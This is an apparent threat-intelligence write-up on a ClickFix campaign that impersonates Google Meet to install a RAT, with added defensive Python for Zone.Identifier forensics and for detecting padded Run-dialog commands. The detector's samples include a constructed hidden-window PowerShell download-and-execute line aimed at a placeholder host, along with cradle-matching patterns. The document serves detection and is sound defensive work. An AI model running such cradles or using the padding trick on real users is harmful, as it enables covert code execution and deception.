A sophisticated malware campaign is targeting remote workers and organizations by impersonating a Google Meet landing page on the deceptive domain gogl-meet[.]com. The attack employs a social engineering technique known as ClickFix to circumvent standard browser security features and install a Remote Access Trojan (RAT) onto the victim’s system. The initial stage of the attack involves a user navigating to the fraudulent site, which is visually identical to the legitimate Google Meet interface.
Instead of displaying a video feed, the user is presented with a pop-up error message, typically titled “Can’t join the meeting,” which claims there’s an issue with the camera or microphone. Unlike traditional phishing that seeks login credentials, this page offers a false technical “fix” that demands specific, physical user interaction. The victim is instructed to perform a sequence of keystrokes: press Windows key + R, then CTRL + V, and finally Enter.
Crucially, the user clicking the “Join now” or “Fix” button on the fake page initiates a JavaScript function that silently copies a malicious PowerShell script to their clipboard. By then following the provided manual keystroke instructions, the victim unknowingly pastes and executes this script via the Windows Run dialog. This technique is highly effective as it leverages the user’s manual action to bypass typical browser-based security filters, such as Google Safe Browsing and SmartScreen.
Forensic investigations of systems infected through gogl-meet[.]com confirmed a direct path leading to a RAT infection. Analysis of the Master File Table (MFT) provided critical evidence: the MFT entry for the dropped payload carried essential origin data in its Alternate Data Stream (ADS). This artifact linked the execution of the RAT back to the file downloaded by the ClickFix page and to the referrer URL, definitively tying the malware to the browser-based social engineering event rather than to a standard email attachment or drive-by download.
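The origin data the article describes lives in the `Zone.Identifier` named stream that browsers write next to a downloaded file (the Mark-of-the-Web). The following parser is an added example, not code from the article or from any investigation it references; it recovers `ReferrerUrl` and `HostUrl` from such a stream and checks the referrer host against a watchlist. The sample stream and the `example-cdn.invalid` host are constructed for illustration; only the `gogl-meet.com` domain comes from the article.

```python
"""Recover download provenance from a Zone.Identifier alternate data stream.

Added example (not from the original article). On NTFS, a file saved by a
browser carries a ``<file>:Zone.Identifier`` stream in INI format. Its
``ReferrerUrl`` / ``HostUrl`` keys are what tie a dropped payload back to the
page that served it, which is the link the forensic analysis above relied on.
"""
import configparser
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Constructed sample of a Zone.Identifier stream as a browser would write it.
# The referrer domain is the one named in the article; the host is a placeholder.
SAMPLE_ADS = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://gogl-meet.com/\r\n"
    "HostUrl=https://example-cdn.invalid/update.exe\r\n"
)

# URLZONE_* values as written by the Windows shell.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted",
              3: "Internet", 4: "Restricted"}


@dataclass
class MarkOfTheWeb:
    zone_id: int
    zone_name: str
    referrer_url: Optional[str]
    host_url: Optional[str]


def parse_zone_identifier(text: str) -> MarkOfTheWeb:
    """Parse the INI-style body of a Zone.Identifier stream."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    cp.optionxform = str  # keep key case so URLs and keys round-trip exactly
    cp.read_string(text)
    sec = cp["ZoneTransfer"]
    zone = int(sec.get("ZoneId", "-1"))
    return MarkOfTheWeb(zone, ZONE_NAMES.get(zone, "Unknown"),
                        sec.get("ReferrerUrl"), sec.get("HostUrl"))


def read_mark_of_the_web(path: str) -> Optional[MarkOfTheWeb]:
    """Read <path>:Zone.Identifier on Windows/NTFS; None if absent or unreadable."""
    try:
        with open(f"{path}:Zone.Identifier", "r", encoding="utf-8",
                  errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except (OSError, KeyError, ValueError):
        return None


def referrer_host(motw: MarkOfTheWeb) -> Optional[str]:
    """Host name of the referring page, or None when no referrer was recorded."""
    return urlparse(motw.referrer_url).hostname if motw.referrer_url else None


def matches_watchlist(motw: MarkOfTheWeb, watchlist: set) -> bool:
    """True when the referrer or host domain (or a subdomain) is on the watchlist."""
    hosts = [referrer_host(motw)]
    if motw.host_url:
        hosts.append(urlparse(motw.host_url).hostname)
    for h in hosts:
        if h and any(h == w or h.endswith("." + w) for w in watchlist):
            return True
    return False


if __name__ == "__main__":
    m = parse_zone_identifier(SAMPLE_ADS)
    print(f"zone={m.zone_name} referrer={m.referrer_url} host={m.host_url}")
    print("watchlist hit:", matches_watchlist(m, {"gogl-meet.com"}))
```

On a live system the stream is read with `read_mark_of_the_web(r"C:\Users\<user>\Downloads\<payload>")`; MFT parsers that carve `$DATA` attributes expose the same bytes for files that have since been deleted, which is how the analysis above recovered the link after the fact.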
A notable feature of this malware wave is the obfuscation used within the PowerShell payload. Threat actors are padding the malicious script with extensive comments containing trusted Unicode visual symbols, such as repeated green check marks (✅). This tactic is designed to visually reassure the victim, as these symbols may be the only text visible in the small Windows Run box, suggesting the command is “verified.” Technically, the padding also pushes the actual malicious code, often an IEX download cradle, out of the immediate visible area of the dialog box, effectively masking the script’s true intent from a quick glance. This latest iteration, simulating a Google Meet glitch, demonstrates a shift toward targeting corporate environments where video conferencing friction is a common, and therefore trusted, occurrence.
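The padding trick described above leaves a measurable fingerprint: a Run-dialog command whose comments are dominated by non-ASCII symbol characters and whose first executable token sits well past the width of the Run box. The detector below is an added example, not code from the article; it scores command strings of the kind recovered from a user's `RunMRU` history. All sample commands are constructed, and the `example.invalid` URL is a placeholder.

```python
"""Heuristic detection of symbol-padded ClickFix commands in Run-dialog history.

Added example (not from the original article). It strips PowerShell comments,
counts Unicode symbol characters used as visual padding, and flags download
cradles and hidden-window switches so that a padded one-liner stands out from
ordinary Run-dialog use.
"""
import re
import unicodedata
from dataclasses import dataclass, field
from typing import List

BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.DOTALL)
LINE_COMMENT_RE = re.compile(r"#[^\r\n]*")
# Generic download-and-execute tokens; 'iex' is the cradle the article names.
CRADLE_RE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\birm\b|\biwr\b"
    r"|frombase64string", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

SYMBOL_PADDING_MIN = 10   # symbols inside comments before we call it padding
VISIBLE_WIDTH = 60        # rough character width of the Run dialog text box

# Constructed samples. "padded" mirrors the check-mark padding the article
# describes; "benign" and "admin" are ordinary Run-dialog entries.
SAMPLES = {
    "padded": 'powershell -w hidden -c "<# ' + "\u2705 " * 30
              + 'Verified by Google Meet #> iex (iwr https://example.invalid/fix)"',
    "benign": "notepad.exe",
    "admin": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
}


@dataclass
class Verdict:
    suspicious: bool
    reasons: List[str] = field(default_factory=list)


def comment_text(cmd: str) -> str:
    """Concatenate every PowerShell comment found in the command."""
    blocks = BLOCK_COMMENT_RE.findall(cmd)
    rest = BLOCK_COMMENT_RE.sub(" ", cmd)
    return "".join(blocks) + "".join(LINE_COMMENT_RE.findall(rest))


def strip_comments(cmd: str) -> str:
    """Remove block and line comments (a '#' inside a URL fragment is also dropped;
    acceptable for a heuristic that only looks for executable tokens)."""
    return LINE_COMMENT_RE.sub(" ", BLOCK_COMMENT_RE.sub(" ", cmd))


def count_symbol_padding(text: str) -> int:
    """Number of non-ASCII characters in the Unicode 'Symbol' categories (So, Sm, ...)."""
    return sum(1 for ch in text
               if ord(ch) > 127 and unicodedata.category(ch).startswith("S"))


def analyze_run_command(cmd: str) -> Verdict:
    reasons = []
    symbols = count_symbol_padding(comment_text(cmd))
    if symbols >= SYMBOL_PADDING_MIN:
        reasons.append("unicode_symbol_padding")
    cradle = CRADLE_RE.search(strip_comments(cmd))
    if cradle:
        reasons.append("download_cradle")
        # Where does the first executable token sit in the original string?
        first = CRADLE_RE.search(cmd)
        if first and first.start() > VISIBLE_WIDTH:
            reasons.append("code_pushed_past_visible_area")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden_window")
    return Verdict(bool(reasons), reasons)


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        v = analyze_run_command(cmd)
        print(f"{name:7s} suspicious={v.suspicious} reasons={v.reasons}")
```

In practice the input comes from each user's `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` values (or from PowerShell script-block logs, which record the full command regardless of what the Run box displayed); any hit on `unicode_symbol_padding` together with `download_cradle` is a strong ClickFix indicator worth an alert on its own.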